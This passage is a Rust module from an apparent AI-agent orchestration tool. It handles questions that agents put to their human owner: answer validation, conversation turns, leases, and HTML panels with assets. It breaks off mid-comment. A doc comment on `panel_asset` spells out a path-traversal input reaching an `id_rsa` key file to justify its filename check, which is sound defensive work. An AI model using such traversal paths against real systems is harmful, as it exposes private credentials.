magi/ask.rs
1//! Questions: what an agent does when the next decision is the owner's.
2//!
3//! An agent that reaches a fork it has no authority to take - which storage
4//! backend, whether a breaking change is acceptable, which of two readings of
5//! the task is meant - has two options. It can guess, and produce an
6//! implementation the owner throws away; or it can stop and ask. This module is
7//! the second option, and it is the reason the graph can be left alone
8//! overnight without also being left to invent product decisions.
9//!
10//! Stopping is cheap on purpose. The run parks as [`RunStatus::Waiting`], which
11//! [`crate::daemon::settle`] refunds, so a question does not spend a task's
12//! retry budget: an operator who asks twice would otherwise come back to a held
13//! task that never had a line of code judged.
14//!
15//! # Shape
16//!
17//! Deliberately the same split as [`crate::queue`]. [`Question`] is data plus
18//! *pure* transitions - [`Question::answer`] is where a phone posting a choice
19//! the question never offered is rejected, and it touches no disk. [`Questions`]
20//! owns all I/O and is constructed with its root, so a test drives a real store
21//! in a temp directory without touching the operator's real home.
22//!
23//! One question is one JSON file under [`Questions`]'s root, written atomically.
24//! Files rather than a database because three processes read and write these
25//! records - the run that asked, `magi web` serving the phone, and `magi answer`
26//! at a terminal - and a rename is the only cross-process atomic write that
27//! needs no coordination between them. It is also why the wait below polls: the
28//! answer arrives in a file written by a process this one has no channel to.
29//!
30//! [`RunStatus::Waiting`]: crate::run::RunStatus::Waiting
31
32use std::path::{Path, PathBuf};
33use std::time::Duration;
34
35use anyhow::{Context, Result, bail};
36use jiff::Timestamp;
37use serde::{Deserialize, Serialize};
38
39use crate::config;
40use crate::proc::Quiet as _;
41use crate::run::RunStatus;
42
43/// On-disk format for a question. Bumped when a field's meaning changes, or -
44/// as with [`Question::thread`], [`Question::answer_timeout`] and now the
45/// waiter bookkeeping ([`Question::cwd`], [`Question::waiter`],
46/// [`Question::delivered_turns`], [`Question::answer_delivered`]) - when a
47/// new field is added that a much older magi has no notion of at all.
48///
49/// The web UI is written against this shape by hand - there is no shared schema
50/// between the front end and this struct - so a field that changes meaning
51/// without a bump here is a UI that lies silently.
52///
53/// A file is refused only when its own `schema` is *greater* than this one -
54/// see [`read_path`] - never merely different: `#[serde(default)]` on every
55/// field added since 1 is what makes an older file's absence of `thread` mean
56/// "no conversation yet" rather than "unreadable", and a strict equality check
57/// would turn every bump into an upgrade that breaks reading yesterday's
58/// question files.
59pub const SCHEMA: u32 = 4;
60
61/// How often the wait re-reads the question file.
62///
63/// Three seconds: the answer comes from a human on a phone, so the difference
64/// between three seconds and three hundred milliseconds is invisible to them,
65/// while a tight loop would `stat` and parse a file thousands of times per
66/// minute for a wait that routinely lasts hours. Nothing is held between polls -
67/// no lock, no open handle - because `magi web` and `magi answer` write the
68/// same file from other processes.
69const POLL: Duration = Duration::from_secs(3);
70
71/// How long an agent's reply may go unnoticed before it earns its own
72/// notification.
73///
74/// An operator reading the card when the agent replies does not need paging
75/// again for a conversation they are already in; one who walked away still
76/// needs the tap on the shoulder. Five minutes is a judgement call about that
77/// line, not a policy a repository has an opinion about, which is why it lives
78/// here rather than in `magi.toml`: the operator cannot tell from `magi.toml`
79/// whether they are still looking at the phone, and neither can this build, so
80/// there is nothing for a per-repository setting to be *right* about.
81const REPLY_QUIET_WINDOW: Duration = Duration::from_secs(5 * 60);
82
83/// How long the operator's notification command may run before it is killed.
84///
85/// A webhook that hangs must not hang the run. Twenty seconds is long enough
86/// for a slow HTTP round trip and short enough that the operator still gets the
87/// question filed and the run parked in a bounded time.
88const NOTIFY_TIMEOUT: Duration = Duration::from_secs(20);
89
90/// The longest a single `magi ask` invocation may block on the owner before
91/// it hands the wait back to whatever is running it, rather than to
92/// [`Question::abandon`].
93///
94/// `answer_timeout` defaults to a day, and that is a deadline for the
95/// *question*, not a budget the calling process is free to spend all at
96/// once: an agent CLI's own shell tool kills a command that runs much longer
97/// than this, and the child it kills is `magi ask` itself - the one thing
98/// that would have read the owner's answer. Run 20260908-205802-c9eb is what
99/// that looks like end to end: seat `impl-A` asked, its tool timed the wait
100/// out, and the seat's own summary said it had backgrounded the blocking
101/// `magi ask` and would "continue once the owner replies" - except nothing
102/// was left to notice the reply. The seat exited `completed`, the
103/// backgrounded child died with it, and the owner's eventual answer on the
104/// web UI had nobody left to read it.
105///
106/// So a wait is sliced instead: this call blocks for at most `WAIT_SLICE`
107/// and returns [`Wait::Pending`] if nothing happened, which is not a
108/// failure - the caller runs `magi ask --wait <id>` again, in a fresh
109/// process the tool timeout has never seen. Four minutes leaves a ten-minute
110/// tool budget room for the CLI's own startup and the notification's round
111/// trip, while staying long enough that an owner who answers within the hour
112/// is not making an agent loop through fifteen slices to hear about it.
113const WAIT_SLICE: Duration = Duration::from_secs(240);
114
115/// How long a lease stays believable after its last beat.
116///
117/// Longer than [`WAIT_SLICE`]'s hand-back gap by a wide margin: a slice that
118/// ends with [`Wait::Pending`] leaves the asking agent a moment to call
119/// `magi ask --wait` again, and a reply leaves it a moment to call `--thread`.
120/// A holder that beats every [`POLL`] and is silent for ninety seconds is gone
121/// or about to be, and a lease that is merely between two calls must not be
122/// mistaken for that - the daemon waiter would start a second agent on a
123/// conversation the first is still in.
124pub const LEASE_TTL: Duration = Duration::from_secs(90);
125
126/// How long [`Questions::update`]'s lock may be held before it is presumed
127/// left behind by a writer that died.
128const LOCK_STALE: Duration = Duration::from_secs(10);
129
130/// Environment variable naming the base URL of the web UI, for `{url}`.
131///
132/// A run cannot discover this by itself: `magi web` is a different process,
133/// usually started by hand and often on a different machine on the tailnet, and
134/// the address it settled on (Tailscale IP, port, or the fallback it warned
135/// about) exists only in that process. So the operator names it once, in the
136/// environment `magi serve` runs in - `magi web --open` prints exactly the
137/// string to use on stdout. Unset means `{url}` expands to nothing rather than
138/// to a guess: a notification carrying a link to an address nothing is
139/// listening on is worse than one carrying no link at all.
140pub const WEB_URL_ENV: &str = "MAGI_WEB_URL";
141
142/// Largest panel magi will store, html plus assets.
143///
144/// Checked as a total, before a single byte is written, because the failure
145/// this prevents is not a full disk but a half-copied panel: an agent that
146/// points at a 200 MB screen recording must get one clean error, not a
147/// directory holding the three small files that fitted before the copy died.
148/// Eight mebibytes is far more than a diff, a table and a handful of images
149/// need, and small enough that a phone on a hotel link still renders it.
150pub const PANEL_MAX_BYTES: u64 = 8 * 1024 * 1024;
151
152/// Suffix of the directory holding one question's panel.
153///
154/// A sibling of `<id>.json` rather than a subdirectory of the store, so
155/// [`Questions::list`] - which takes every `*.json` in the root - cannot ever
156/// see it, and so a panel travels with the question it belongs to.
157const PANEL_DIR: &str = ".panel";
158
159/// The panel's entry point inside its directory.
160const PANEL_HTML: &str = "index.html";
161
162/// Scratch directory a panel is assembled in before it is swapped into place.
163const PANEL_TMP: &str = ".panel.tmp";
164
165/// The one asset filename rule, applied on write **and** on read.
166///
167/// Exactly `^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$`, and additionally never
168/// containing `..`. The pattern is this narrow because the name arrives from
169/// two untrusted directions and is then joined onto a path: an agent naming
170/// the asset, and a URL naming it back to [`Questions::panel_asset`]. Every
171/// character that could change what the join means is outside the set - `/`
172/// and `\` cannot appear, so no name can descend or escape; a leading `.` is
173/// refused, so no name can be `..`, `.` or a dotfile; a drive letter's `:` is
174/// refused, which matters because on Windows `Path::join` with an absolute
175/// path *discards the whole prefix* and would serve any file on the disk.
176/// `..` is refused anywhere rather than only at the front so the rule reads
177/// the same as the sentence "no traversal" to anyone auditing it.
178///
179/// The length bound keeps a name inside every filesystem's limit, so a panel
180/// that stores cannot fail to store on the operator's other machine.
181pub fn valid_asset_name(name: &str) -> bool {
182 if name.is_empty() || name.len() > 64 || name.contains("..") {
183 return false;
184 }
185 let mut chars = name.chars();
186 chars.next().is_some_and(|c| c.is_ascii_alphanumeric())
187 && chars.all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
188}
189
190/// Where a question is in its life.
191#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
192#[serde(rename_all = "lowercase")]
193pub enum QuestionStatus {
194 /// Asked, and waiting for the owner. A run is parked behind it.
195 Open,
196 /// The owner decided. [`Question::answer`] holds what they said.
197 Answered,
198 /// Nobody answered in time, or the question outlived the run that asked.
199 /// Kept rather than deleted: what was asked and never answered is the
200 /// evidence that the operator was the bottleneck.
201 Abandoned,
202}
203
204impl QuestionStatus {
205 /// Is a run still parked behind this question?
206 pub fn open(self) -> bool {
207 matches!(self, Self::Open)
208 }
209
210 /// Lowercase name, as it appears on disk and in the API.
211 pub fn as_str(self) -> &'static str {
212 match self {
213 Self::Open => "open",
214 Self::Answered => "answered",
215 Self::Abandoned => "abandoned",
216 }
217 }
218}
219
220/// What the owner said.
221///
222/// Two shapes rather than one string because the question decides which is
223/// admissible, and [`Question::answer`] enforces it. A phone that posts
224/// `{"choice": "Redis"}` to a question that never offered Redis is a bug in the
225/// front end, and it is caught here rather than handed to an agent as fact.
226#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
227#[serde(rename_all = "lowercase")]
228pub enum Answer {
229 /// One of the offered choices, verbatim.
230 Choice(String),
231 /// Free text, for a question that offered no choices.
232 Text(String),
233}
234
235/// Who wrote one turn of a question's conversation.
236///
237/// Two values, not three: [`Question::thread`] is the record of a single
238/// question stopping and resuming, and the agent that resumes it is always
239/// the one that asked - a fresh consultant would have to be caught up on
240/// everything the first agent already knows, which is the round trip this
241/// module exists to avoid. The names and the wire spelling deliberately match
242/// [`crate::chat::Who`], which this module does not depend on: the two are the
243/// same idea in two products, and giving them the same shape is what lets the
244/// phone render both with one component.
245#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
246#[serde(rename_all = "lowercase")]
247pub enum Who {
248 /// The person the agent asked.
249 Operator,
250 /// The agent that asked, replying to a question of its own rather than
251 /// answering.
252 Agent,
253}
254
255/// One turn in a question's back-and-forth, after the question itself was
256/// asked.
257///
258/// The question's own `summary`/`detail`/`choices` already carry the agent's
259/// opening move, so a turn only exists from the moment the owner talks back -
260/// [`Question::thread`] starts empty and stays that way for the overwhelming
261/// majority of questions, which are answered on the first read.
262#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
263#[serde(deny_unknown_fields)]
264pub struct Turn {
265 /// Who said it.
266 pub who: Who,
267 /// What they said.
268 pub body: String,
269 /// When they said it.
270 pub at: Timestamp,
271}
272
273/// Who is keeping watch over an open question.
274#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
275#[serde(rename_all = "lowercase")]
276pub enum WaiterKind {
277 /// The `magi ask` process the agent started.
278 Asker,
279 /// The `magi serve` waiter ([`crate::waiter`]), resuming the asking seat's
280 /// own session because the asker is gone.
281 Daemon,
282}
283
284/// The record's note of who was last known to be waiting.
285///
286/// A note, not a promise: nothing rewrites the question when a holder dies, so
287/// whether it still holds is read from the [`Lease`] beside it.
288#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
289pub struct Waiter {
290 /// Who took the wait.
291 pub kind: WaiterKind,
292 /// When they took it.
293 pub since: Timestamp,
294}
295
296/// A sidecar (`<id>.lease`) saying that something is alive and waiting.
297///
298/// A sidecar rather than a field of the question because a holder beats every
299/// few seconds, and rewriting the question that often would race the phone's
300/// answer and say with lost updates. It is not `*.json`, so
301/// [`Questions::list`] never sees it. No pid check: pids are reused and mean
302/// different things across platforms, while a beat that stopped is evidence on
303/// every one.
304#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
305pub struct Lease {
306 /// Who beat last.
307 pub kind: WaiterKind,
308 /// Their process id, for a human reading the file.
309 pub pid: u32,
310 /// When they beat last.
311 pub beat_at: Timestamp,
312}
313
314impl Lease {
315 /// Was the last beat recent enough to believe the holder is still there?
316 pub fn fresh(&self, now: Timestamp) -> bool {
317 now.as_second() - self.beat_at.as_second() <= LEASE_TTL.as_secs() as i64
318 }
319}
320
321/// One decision magi will not take on the owner's behalf.
322#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
323#[serde(deny_unknown_fields)]
324pub struct Question {
325 /// On-disk format version.
326 pub schema: u32,
327 /// Question id, e.g. `20260902-231501-ab12`. Same shape as a run's and a
328 /// task's, so the operator can paste any of them at any prefix argument.
329 pub id: String,
330 /// Run that is parked behind this question.
331 pub run: String,
332 /// Graph node the asking agent was working in, e.g. `implement`.
333 pub node: String,
334 /// Seat that asked, e.g. `impl-A`. Recorded because "which agent needs
335 /// this" decides whether the answer unblocks one candidate or all of them.
336 pub seat: String,
337 /// One line: the question itself. This is what a notification carries and
338 /// what the phone shows above the answer controls.
339 pub summary: String,
340 /// The reasoning behind the question, as markdown. May be long, may be
341 /// empty. Rendered as text nodes by the UI, never as markup.
342 pub detail: String,
343 /// The admissible answers. **Empty means free text** - that one condition
344 /// is the whole difference between the two kinds of question, on disk, in
345 /// the UI, and in [`Question::answer`]'s validation.
346 pub choices: Vec<String>,
347 /// Does this question have an agent-authored HTML panel beside it?
348 ///
349 /// Serialised with a default so a question written by an older magi - or
350 /// by hand - still deserialises rather than failing the whole store, which
351 /// under [`Questions::list`]'s skip-unreadable rule would quietly hide the
352 /// open question the operator was looking for.
353 #[serde(default)]
354 pub panel: bool,
355 /// Files copied in beside the panel's html, by base name, sorted.
356 ///
357 /// The list exists so a reader knows what a panel is made of without
358 /// walking the directory, and every entry satisfies [`valid_asset_name`].
359 /// Sorted because it is compared - a question re-asked with the same
360 /// assets in a different argument order is not a different question.
361 #[serde(default)]
362 pub assets: Vec<String>,
363 /// Current state.
364 pub status: QuestionStatus,
365 /// When the agent asked.
366 pub asked_at: Timestamp,
367 /// When the owner answered, if they did.
368 pub answered_at: Option<Timestamp>,
369 /// What they said.
370 pub answer: Option<Answer>,
371 /// Everything said after the question itself, oldest first: the owner
372 /// asking back, the agent replying, as many times as it takes before an
373 /// [`Answer`] lands.
374 ///
375 /// `#[serde(default)]` so a question written before this field existed -
376 /// every question on disk before this build - still deserialises as one
377 /// with no conversation yet, rather than failing [`Questions::list`]'s
378 /// read and quietly hiding an open question from the operator.
379 #[serde(default)]
380 pub thread: Vec<Turn>,
381 /// The `answer_timeout`, in seconds, that was in force when this question
382 /// was first asked. `0` means unrecorded - a question written before this
383 /// field existed, or one filed by a flow (land's merge-approval gate)
384 /// that never sets it because it never resumes a sliced wait.
385 ///
386 /// [`Question::new`] cannot know this - the effective timeout (`--timeout`,
387 /// or the config default) is decided by the caller, after the question
388 /// already exists - so it starts at `0` here and whoever files a fresh
389 /// question sets it once, the same way [`Question::panel`] is set by
390 /// [`Questions::put_panel`] rather than by the constructor. It is never
391 /// touched again: `magi ask --wait` reads it as the one deadline it is
392 /// allowed to enforce, precisely so that a `--timeout` given (or omitted)
393 /// on a later call can never quietly extend or shrink the budget the
394 /// question was actually asked with.
395 #[serde(default)]
396 pub answer_timeout: u64,
397 /// The directory the asking agent was working in when it asked, so the
398 /// daemon waiter can resume that agent's session from where it stood.
399 /// `None` for a question no `magi ask` filed (land's approval gate, a
400 /// release notice, one written before this field existed): those have no
401 /// agent to hand anything back to, and the waiter leaves them alone.
402 #[serde(default)]
403 pub cwd: Option<String>,
404 /// Who was last known to be waiting - see [`Waiter`].
405 #[serde(default)]
406 pub waiter: Option<Waiter>,
407 /// How many entries of [`Question::thread`] the agent has been shown, by
408 /// the asking process printing them or by the waiter resuming the seat.
409 /// The owner's turn at an index at or past this has reached nobody yet.
410 #[serde(default)]
411 pub delivered_turns: usize,
412 /// Has the agent been told the [`Answer`]? The asker prints it as it
413 /// returns; the waiter delivers it when the asker was gone.
414 #[serde(default)]
415 pub answer_delivered: bool,
416}
417
418impl Question {
419 /// Ask something. Persist it with [`Questions::put`], or hand it to
420 /// [`ask_and_wait`], which files it and waits.
421 pub fn new(
422 run: String,
423 node: String,
424 seat: String,
425 summary: String,
426 detail: String,
427 choices: Vec<String>,
428 ) -> Self {
429 Self {
430 schema: SCHEMA,
431 id: new_id(),
432 run,
433 node,
434 seat,
435 summary,
436 detail,
437 choices,
438 panel: false,
439 assets: Vec::new(),
440 status: QuestionStatus::Open,
441 asked_at: Timestamp::now(),
442 answered_at: None,
443 answer: None,
444 thread: Vec::new(),
445 answer_timeout: 0,
446 cwd: None,
447 waiter: None,
448 delivered_turns: 0,
449 answer_delivered: false,
450 }
451 }
452
453 /// Short form used in reports and on the phone, matching a run's short id.
454 pub fn short(&self) -> &str {
455 short(&self.id)
456 }
457
458 /// Does this question want free text rather than one of a set?
459 pub fn free_text(&self) -> bool {
460 self.choices.is_empty()
461 }
462
463 /// Record an answer. Rejects a choice the question does not offer, free
464 /// text on a multiple-choice question, an empty answer, and a second
465 /// answer.
466 ///
467 /// Every rejection here is a case where accepting would put a fabrication
468 /// in front of an agent as if the owner had said it. The messages are
469 /// distinct because the caller is a web handler that shows them verbatim,
470 /// and "that is not one of the choices" and "this question is multiple
471 /// choice" are different mistakes with different fixes.
472 pub fn answer(&mut self, answer: Answer) -> Result<()> {
473 match self.status {
474 QuestionStatus::Answered => bail!(
475 "question {} was already answered; the run has moved on and a \
476 second answer would be a decision nobody acted on",
477 self.short()
478 ),
479 QuestionStatus::Abandoned => bail!(
480 "question {} was abandoned and the run behind it is gone",
481 self.short()
482 ),
483 QuestionStatus::Open => {}
484 }
485 let body = match &answer {
486 Answer::Choice(c) | Answer::Text(c) => c.as_str(),
487 };
488 if body.trim().is_empty() {
489 bail!(
490 "question {} needs an answer; an empty one tells the agent \
491 nothing and it would guess anyway",
492 self.short()
493 );
494 }
495 match &answer {
496 Answer::Choice(c) if self.free_text() => bail!(
497 "question {} asks for free text, so `{c}` cannot be a choice \
498 it offered",
499 self.short()
500 ),
501 Answer::Choice(c) if !self.choices.iter().any(|o| o == c) => bail!(
502 "`{c}` is not one of the choices question {} offers: {}",
503 self.short(),
504 self.choices.join(", ")
505 ),
506 Answer::Text(_) if !self.free_text() => bail!(
507 "question {} is multiple choice; answer with one of: {}",
508 self.short(),
509 self.choices.join(", ")
510 ),
511 _ => {}
512 }
513 self.answered_at = Some(Timestamp::now());
514 self.answer = Some(answer);
515 self.status = QuestionStatus::Answered;
516 Ok(())
517 }
518
519 /// Give up on an answer, keeping the record of what was asked.
520 ///
521 /// An answered question is left alone, which matters at exactly one moment:
522 /// the owner answering in the same second the wait's deadline passes. The
523 /// answer is the thing worth keeping there, and it has already been written
524 /// by another process.
525 ///
526 /// The reason is appended to [`Question::detail`] because the on-disk shape
527 /// is a contract with the front end and has no field of its own for it -
528 /// and "asked at 3am, nobody home for a day" belongs with the question, not
529 /// only in a log the operator will never open.
530 pub fn abandon(&mut self, why: impl Into<String>) {
531 if !self.status.open() {
532 return;
533 }
534 self.status = QuestionStatus::Abandoned;
535 let why = why.into();
536 let why = why.trim();
537 if why.is_empty() {
538 return;
539 }
540 if !self.detail.is_empty() {
541 self.detail.push('\n');
542 }
543 self.detail.push_str("\n_Abandoned: ");
544 self.detail.push_str(why);
545 self.detail.push_str("._\n");
546 }
547
548 /// The answer as the asking agent should read it.
549 ///
550 /// One string for both kinds of question: the agent's prompt says "the
551 /// owner answered:", and a chosen option and a typed sentence are the same
552 /// thing at that point. `None` while the question is open or abandoned, so
553 /// a caller cannot mistake silence for a decision.
554 pub fn resolution(&self) -> Option<String> {
555 match (self.status, &self.answer) {
556 (QuestionStatus::Answered, Some(Answer::Choice(a) | Answer::Text(a))) => {
557 Some(a.clone())
558 }
559 _ => None,
560 }
561 }
562
563 /// The owner speaking back without answering: a request for context, a
564 /// clarifying question, anything short of a decision.
565 ///
566 /// Rejects the same two states [`Question::answer`] does, and for the same
567 /// reason - a question with a recorded [`Answer`] or an abandoned one has
568 /// no run left listening for a reply - and an empty turn, which would tell
569 /// the agent nothing it didn't already know. Never changes `status`: the
570 /// question stays [`QuestionStatus::Open`], because the owner did not
571 /// decide anything, they only spoke, and `count_open`/`open_for` must keep
572 /// counting this as the one question it always was.
573 pub fn say(&mut self, body: impl Into<String>) -> Result<()> {
574 match self.status {
575 QuestionStatus::Answered => bail!(
576 "question {} was already answered; there is nothing left to \
577 discuss",
578 self.short()
579 ),
580 QuestionStatus::Abandoned => bail!(
581 "question {} was abandoned and the run behind it is gone",
582 self.short()
583 ),
584 QuestionStatus::Open => {}
585 }
586 let body = body.into();
587 if body.trim().is_empty() {
588 bail!("a message to question {} cannot be empty", self.short());
589 }
590 self.thread.push(Turn {
591 who: Who::Operator,
592 body,
593 at: Timestamp::now(),
594 });
595 Ok(())
596 }
597
598 /// The agent replying to the owner's last word, in place of an answer:
599 /// same question, same id, another round.
600 ///
601 /// `choices` replaces [`Question::choices`] wholesale rather than merging,
602 /// on the same reasoning [`Questions::put_panel`] replaces a panel
603 /// wholesale: the whole point of asking back is that what should be
604 /// offered next may have changed, and a caller that wanted the old set
605 /// unchanged can simply pass it again. An empty `Vec` means free text,
606 /// exactly as it does when the question is first asked.
607 pub fn reply(&mut self, body: impl Into<String>, choices: Vec<String>) -> Result<()> {
608 match self.status {
609 QuestionStatus::Answered => bail!(
610 "question {} was already answered; replying now would not \
611 reach anyone",
612 self.short()
613 ),
614 QuestionStatus::Abandoned => bail!(
615 "question {} was abandoned and the run behind it is gone",
616 self.short()
617 ),
618 QuestionStatus::Open => {}
619 }
620 let body = body.into();
621 if body.trim().is_empty() {
622 bail!("a reply to question {} cannot be empty", self.short());
623 }
624 self.choices = choices;
625 let unread = self.unread_from_owner().is_some();
626 self.thread.push(Turn {
627 who: Who::Agent,
628 body,
629 at: Timestamp::now(),
630 });
631 // The agent has read everything up to its own reply - but only if
632 // nothing the owner said in the meantime is still unread. A second say
633 // that landed after the agent's last look must stay undelivered.
634 if !unread {
635 self.delivered_turns = self.thread.len();
636 }
637 Ok(())
638 }
639
640 /// What the owner said that the agent has not read yet, oldest first,
641 /// joined. `None` unless the question is open and such a turn exists.
642 ///
643 /// Not [`Question::waiting_on_agent`]: an agent's reply can land *after* a
644 /// second owner turn it never saw, which leaves the last turn the agent's
645 /// and the ball apparently back with the owner while a say is still unread.
646 pub fn unread_from_owner(&self) -> Option<String> {
647 if !self.status.open() {
648 return None;
649 }
650 let from = self.delivered_turns.min(self.thread.len());
651 let said: Vec<&str> = self.thread[from..]
652 .iter()
653 .filter(|t| t.who == Who::Operator)
654 .map(|t| t.body.as_str())
655 .collect();
656 (!said.is_empty()).then(|| said.join("\n\n"))
657 }
658
659 /// When the conversation last moved: the newest thread turn, or the asking
660 /// itself, in seconds. `magi ask --thread` re-arms `answer_timeout` on
661 /// every reply, so a deadline runs from here and not from `asked_at`.
662 pub fn last_activity(&self) -> i64 {
663 self.thread
664 .iter()
665 .map(|t| t.at.as_second())
666 .max()
667 .unwrap_or(0)
668 .max(self.asked_at.as_second())
669 }
670
671 /// Is the ball in the agent's court?
672 ///
673 /// True from the moment the owner speaks back until the agent's next
674 /// [`Question::reply`], and never on a fresh or an already-settled
675 /// question. [`QuestionStatus`] does not move for either side of this -
676 /// see [`Question::say`] - so this is the one place that state is
677 /// readable at all, which is why [`crate::web::QuestionView`] carries it
678 /// separately rather than asking the phone to infer it from the thread.
679 pub fn waiting_on_agent(&self) -> bool {
680 self.status.open() && matches!(self.thread.last(), Some(t) if t.who == Who::Operator)
681 }
682
683 /// Should a notification go out right now?
684 ///
685 /// Always, for the very first ask: [`Question::thread`] is still empty, so
686 /// there is no earlier operator turn to have already caught anyone's
687 /// attention. After that, only once [`REPLY_QUIET_WINDOW`] has passed
688 /// since the owner's own last word - see that constant for why the window
689 /// exists at all and why its length is not configurable.
690 fn should_notify(&self, now: Timestamp) -> bool {
691 let Some(last) = self
692 .thread
693 .iter()
694 .rev()
695 .find(|t| t.who == Who::Operator)
696 .map(|t| t.at)
697 else {
698 return true;
699 };
700 now.as_second() - last.as_second() > REPLY_QUIET_WINDOW.as_secs() as i64
701 }
702}
703
704/// A question store on disk.
705#[derive(Debug, Clone)]
706pub struct Questions {
707 root: PathBuf,
708}
709
710impl Questions {
711 /// The operator's questions, `<home>/questions`.
712 pub fn open() -> Self {
713 Self::at(crate::run::home().join("questions"))
714 }
715
716 /// A store at an explicit root. Tests use this, which is why none of them
717 /// need the operator's real home.
718 pub fn at(root: PathBuf) -> Self {
719 Self { root }
720 }
721
722 /// Directory holding the question files.
723 pub fn root(&self) -> &Path {
724 &self.root
725 }
726
727 /// Path for one question id.
728 pub fn path_of(&self, id: &str) -> PathBuf {
729 self.root.join(format!("{id}.json"))
730 }
731
732 /// Directory holding one question's panel, `<root>/<id>.panel`.
733 pub fn panel_dir(&self, id: &str) -> PathBuf {
734 self.root.join(format!("{id}{PANEL_DIR}"))
735 }
736
737 /// Store a panel: the html, plus `assets` copied in under their base
738 /// names. Updates `q.panel` and `q.assets`; the caller then [`put`]s the
739 /// question, or the record on disk will deny having a panel that exists.
740 ///
741 /// The assets are **copied, not referenced**. An agent authors its panel
742 /// inside a candidate worktree and points at files there, and `magi fold`
743 /// deletes those worktrees; a question is the permanent record of a
744 /// decision the owner took, so a panel that referenced its own images
745 /// would render as broken boxes exactly when someone went back to ask why
746 /// the decision was made. Copying follows symlinks - [`std::fs::copy`]
747 /// does, and so does the [`std::fs::metadata`] the size is measured with,
748 /// so the bytes counted and the bytes written are the same target file's -
749 /// which is the intent: storing a link would leave the panel pointing at
750 /// the worktree again, one indirection further away.
751 ///
752 /// Everything that can be rejected is rejected before the first byte is
753 /// written, and the panel is then assembled in a scratch directory and
754 /// swapped in. So a refusal leaves the previous panel intact, and a
755 /// success replaces it *wholesale* rather than merging: a re-asked
756 /// question showing one attempt's diff next to another attempt's table
757 /// would be a panel neither agent ever wrote.
758 ///
759 /// [`put`]: Questions::put
760 pub fn put_panel(&self, q: &mut Question, html: &str, assets: &[PathBuf]) -> Result<()> {
761 if !valid_asset_name(&q.id) {
762 bail!(
763 "question id `{}` is not a name magi will build a panel path from",
764 q.id
765 );
766 }
767 if html.trim().is_empty() {
768 bail!(
769 "question {} was handed an empty panel; an empty frame reads to \
770 the owner as \"the agent had nothing to say\", which is a lie",
771 q.short()
772 );
773 }
774
775 // Names, then sizes, then writing - in that order, so nothing below
776 // can leave a partial panel on disk.
777 let mut named: Vec<(String, &Path)> = Vec::with_capacity(assets.len());
778 for src in assets {
779 let name = src.file_name().and_then(|n| n.to_str()).unwrap_or_default();
780 if !valid_asset_name(name) {
781 bail!(
782 "panel asset `{}` cannot be stored: a panel file name must \
783 match ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`",
784 src.display()
785 );
786 }
787 if let Some((_, first)) = named.iter().find(|(n, _)| n == name) {
788 bail!(
789 "two panel assets are both named `{name}` - {} and {} - and \
790 the panel can only show one of them; rename one at the source",
791 first.display(),
792 src.display()
793 );
794 }
795 named.push((name.to_owned(), src.as_path()));
796 }
797
798 let mut total = html.len() as u64;
799 for (_, src) in &named {
800 let meta = std::fs::metadata(src)
801 .with_context(|| format!("stat panel asset {}", src.display()))?;
802 if !meta.is_file() {
803 bail!(
804 "panel asset `{}` is not a file; a panel is html plus files \
805 copied beside it",
806 src.display()
807 );
808 }
809 total = total.saturating_add(meta.len());
810 }
811 if total > PANEL_MAX_BYTES {
812 bail!(
813 "panel for question {} is {total} bytes, over magi's cap of \
814 {PANEL_MAX_BYTES} bytes; nothing was written",
815 q.short()
816 );
817 }
818
819 let tmp = self.root.join(format!("{}{PANEL_TMP}", q.id));
820 let dir = self.panel_dir(&q.id);
821 std::fs::create_dir_all(&self.root)
822 .with_context(|| format!("create {}", self.root.display()))?;
823 clear_dir(&tmp)?;
824 std::fs::create_dir(&tmp).with_context(|| format!("create {}", tmp.display()))?;
825 if let Err(e) = fill_panel(&tmp, html, &named) {
826 // A copy that dies halfway must not become the panel, and must not
827 // leave scratch behind for the next call to inherit.
828 let _ = std::fs::remove_dir_all(&tmp);
829 return Err(e);
830 }
831 clear_dir(&dir)?;
832 std::fs::rename(&tmp, &dir)
833 .with_context(|| format!("move panel into {}", dir.display()))?;
834
835 q.panel = true;
836 q.assets = named.into_iter().map(|(n, _)| n).collect();
837 q.assets.sort_unstable();
838 Ok(())
839 }
840
841 /// The panel's html, or `None` when the question has no panel.
842 ///
843 /// `None` rather than an error for a missing panel because the caller is a
844 /// web handler whose answer is 404 either way, and an unreadable panel is
845 /// not a reason to fail the question it belongs to.
846 pub fn panel_html(&self, id: &str) -> Option<String> {
847 if !valid_asset_name(id) {
848 return None;
849 }
850 std::fs::read_to_string(self.panel_dir(id).join(PANEL_HTML)).ok()
851 }
852
853 /// One file from a panel. `Ok(None)` is "no such file"; `Err` is "that is
854 /// not a name a panel file can have".
855 ///
856 /// Rejects a name failing [`valid_asset_name`] **before touching the
857 /// filesystem**, which is the whole point of the second check: the name
858 /// arrives from a URL, the directory is on disk where any process could
859 /// have dropped a file, and `<root>/<id>.panel/../../id_rsa` is a path the
860 /// operating system would resolve perfectly happily. The two callers'
861 /// distinct outcomes - 400 for a name, 404 for a file - are why this is
862 /// `Result<Option<_>>` rather than one flattened `Option`.
863 pub fn panel_asset(&self, id: &str, name: &str) -> Result<Option<Vec<u8>>> {
864 if !valid_asset_name(name) {
865 bail!(
866 "`{name}` is not a panel file name; it must match \
867 ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`"
868 );
869 }
870 if !valid_asset_name(id) {
871 return Ok(None);
872 }
873 let dir = self.panel_dir(id);
874 if !dir.is_dir() {
875 return Ok(None);
876 }
877 let path = dir.join(name);
878 match std::fs::read(&path) {
879 Ok(bytes) => Ok(Some(bytes)),
880 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(None),
881 Err(e) => Err(e).with_context(|| format!("read {}", path.display())),
882 }
883 }
884
885 /// Delete a question's panel, and any scratch a killed [`put_panel`] left.
886 ///
887 /// Succeeds when there is nothing to delete, so a caller cleaning up does
888 /// not have to know whether a panel was ever written. The question record
